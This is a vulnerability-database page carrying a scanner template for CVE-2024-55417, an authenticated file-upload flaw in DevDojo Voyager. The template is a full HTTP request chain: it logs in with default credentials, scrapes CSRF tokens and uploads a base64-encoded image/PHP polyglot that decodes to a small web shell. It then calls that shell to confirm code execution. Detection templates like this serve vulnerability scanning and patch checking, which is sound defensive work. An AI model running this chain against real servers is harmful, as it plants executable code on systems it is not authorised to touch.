| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-55417 | 30 Jan 202515:15 | – | attackerkb | |
| The vulnerability of the getMimeType function in the Voyager PHP framework Laravel allows a hacker to execute arbitrary code. | 31 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-55417 | 30 Jan 202515:16 | – | circl | |
| Voyager 安全漏洞 | 30 Jan 202500:00 | – | cnnvd | |
| CVE-2024-55417 | 30 Jan 202500:00 | – | cve | |
| CVE-2024-55417 | 30 Jan 202500:00 | – | cvelist | |
| EUVD-2024-52770 | 3 Oct 202520:07 | – | euvd | |
| DevDojo Voyager Arbitrary File Write | 30 Jan 202515:31 | – | github | |
| CVE-2024-55417 | 30 Jan 202515:15 | – | nvd | |
| GHSA-35P2-5VRH-M3P6 DevDojo Voyager Arbitrary File Write | 30 Jan 202515:31 | – | osv |
id: CVE-2024-55417
info:
name: DevDojo Voyager <= 1.8.0 - Arbitrary File Write vulnerability
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
impact: |
Authenticated attackers can bypass file type restrictions to upload PHP web shells, allowing arbitrary code execution on the server with web server privileges.
remediation: |
Update DevDojo Voyager to version 1.8.1 or later to address the file upload validation bypass vulnerability.
reference:
- https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerMediaController.php#L238
classification:
cve-id: CVE-2024-55417
epss-score: 0.12298
epss-percentile: 0.95695
metadata:
verified: true
max-request: 5
shodan-query: title:"Voyager"
tags: cve,cve2024,intrusive,devdojo,voyager,file-upload,authenticated,vuln
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
username: "[email protected]"
password: "password"
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf
group: 1
regex:
- 'name="_token" value="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{csrf}}&email={{username}}&password={{password}}&
matchers:
- type: dsl
dsl:
- "contains(body,'/admin</title>')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/media HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf2
group: 1
regex:
- '"csrf-token" content="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/media/upload HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqv6qtCsokj1vi0NA
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="_token"
{{csrf2}}
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="upload_path"
/
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="filename"
null
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="details"
{"thumbnails":[],"watermark":{}}
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: text/php
{{base64_decode('/9j//gApPD9waHAgZWNobyBiYXNlNjRfZGVjb2RlKCRfR0VUWyJxIl0pOz8+/9sAQwADAgICAgIDAgICAwMDAwQGBAQEBAQIBgYFBgkICgoJCAkJCgwPDAoLDgsJCQ0RDQ4PEBAREAoMEhMSEBMPEBAQ/8kACwgAAQABAQERAP/MAAYAEBAF/9oACAEBAAA/ANLPIP/Z')}}
------WebKitFormBoundaryqv6qtCsokj1vi0NA--
matchers:
- type: word
part: body
words:
- 'Encoding format (php) is not supported.'
internal: true
- raw:
- |
GET /storage/{{randstr}}.php?q={{base64('{{randstr}}')}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{randstr}}"
# digest: 4a0a0047304502206a26ac9e217e3d3e4bce2e08c985b8e5de34cb95ca6b026318e2509687a402d4022100d5a31b9e6312816001801b035a5704a7e174fcd6e3e08c15e67c0e6c063d3ba0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation